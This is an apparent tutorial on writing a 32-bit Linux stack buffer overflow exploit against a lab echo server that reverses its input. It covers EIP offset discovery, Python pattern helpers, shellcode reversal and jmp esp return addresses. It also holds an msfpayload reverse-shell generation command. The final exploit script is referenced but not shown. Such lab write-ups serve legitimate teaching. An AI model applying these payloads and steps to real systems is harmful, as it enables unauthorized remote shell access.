EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux

I am going to do a simple buffer overflow on 32-bit Linux. The target application is vuln-server, which you can download here.

Why do I use this software? Because this echo server behaves differently from a normal echo server: it echoes the message back in reverse order.

Does it matter? Yes, it matters when you are developing the exploit: the shellcode must be reversed, while the return address must not be. This is quite different from normal exploit writing.

I develop this exploit under BackTrack 5r3 (32-bit). Let's compile the echo server with gcc using the following switches, which disable the stack protection:

gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb

Run the vuln-server:

./vuln-server 5700

Open another terminal and run the client:

nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit

Enter something on the client, for example:

Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh

You will find that the message you entered is echoed back in reverse order.

The server side will display:

127.0.0.1:41959 hello world

Now, write a Python script that sends 500 bytes of data to the echo server.

Run it and you will find that the EIP register has been overwritten with A's.

Next, create a 500-character unique pattern to overwrite EIP:

./pattern_create.rb 500

Copy the result into the Python script above and replace the junk with the pattern.

Run the modified Python script again and you will find that EIP is overwritten with 0x416c3341.

Reverse the byte order of the address (the server echoes the buffer back reversed) and find the offset with the following command:

./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339

So, the offset is 339.
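To make the offset step reproducible without the Metasploit scripts, here is an added Python example (my own code, not from the original post or from vuln-server) that reimplements the pattern_create / pattern_offset logic and adds the byte-reversal step that this reversing echo server forces. The function names are my own; the pattern format (Aa0Aa1 ... Zz9) is the one pattern_create.rb produces, and the two EIP values are the ones observed above.

```python
# Added example, not part of the original post: pattern_create / pattern_offset
# in Python, plus the byte-reversal needed when the target echoes the buffer reversed.
import itertools
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Return `length` bytes of the Metasploit-style cyclic pattern.

    Triples are generated as (upper, lower, digit) with the digit changing
    fastest, so the stream starts Aa0Aa1Aa2...Aa9Ab0... and every 4-byte
    window is unique until the full 20280-byte cycle repeats.
    """
    triples = []
    for up, lo, dg in itertools.product(UPPER, LOWER, DIGITS):
        triples.append(up + lo + dg)
        if len(triples) * 3 >= length:
            break
    return "".join(triples)[:length].encode("ascii")


def reverse_dword(value):
    """Reverse the byte order of a 32-bit value: 0x416c3341 -> 0x41336c41.

    This is the manual "reverse the address" step done above before running
    pattern_offset.rb.
    """
    return struct.unpack("<I", struct.pack(">I", value))[0]


def pattern_offset(eip_value, length=500):
    """Find where the 4 bytes now in EIP came from inside the pattern.

    `eip_value` is the register value as the debugger prints it; x86 is
    little-endian, so packing with "<I" recovers the bytes as they lay on
    the stack. Returns -1 when the value is not from the pattern at all
    (for example, EIP was never reached or holds a real code address).
    """
    window = struct.pack("<I", eip_value)
    return pattern_create(length).find(window)


def offset_from_reversed_echo(eip_value, length=500):
    """Same lookup for a server that echoes the buffer back reversed.

    The 4 bytes that reached EIP are the pattern window in reverse order, so
    they are flipped back before searching. For 0x416c3341 the stack bytes
    are b"A3lA", the original window is b"Al3A", and it sits at offset 339.
    """
    window = struct.pack("<I", eip_value)[::-1]
    return pattern_create(length).find(window)


if __name__ == "__main__":
    print(pattern_create(500)[:30].decode())
    print(hex(reverse_dword(0x416c3341)))          # 0x41336c41
    print(pattern_offset(0x41336c41))              # 339
    print(offset_from_reversed_echo(0x416c3341))   # 339
```

Both lookups agree with the output of pattern_offset.rb above: giving the tool the byte-reversed value is the same thing as reversing the stack bytes before the search. A result of -1 is the useful negative check: it means the crash did not come from the pattern bytes at all, so the offset cannot be trusted and the crash needs a closer look in the debugger.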

Now, create the shellcode with msfpayload and encode it with the alpha_upper encoder to avoid the bad characters.

msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper

However, we need to reverse the shellcode with the following Python script:

shellcode = b"blah blah ...."   # paste the msfencode output here as a bytes literal
shellcode = shellcode[::-1]     # reverse it, because the server reverses it again when echoing
shellcode = shellcode.hex()     # hex-encode the reversed bytes (Python 3: bytes.hex())
print(shellcode)

Then add "\x" back in front of every two hex characters of the output.

Okay, it is high time to find the return address.

msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp <----- selected this one

I select the last one as the return address.

As I mentioned, this echo server behaves differently from others: the exploit buffer is consumed backward rather than forward. The final exploit Python script looks like this:

Now, run the listener on port 4444, start the echo server, then run the exploit Python script. Yeah, we got the shell.

The shell we get runs with the privileges of the server process. Therefore, never run any program as root.

That's all! See you.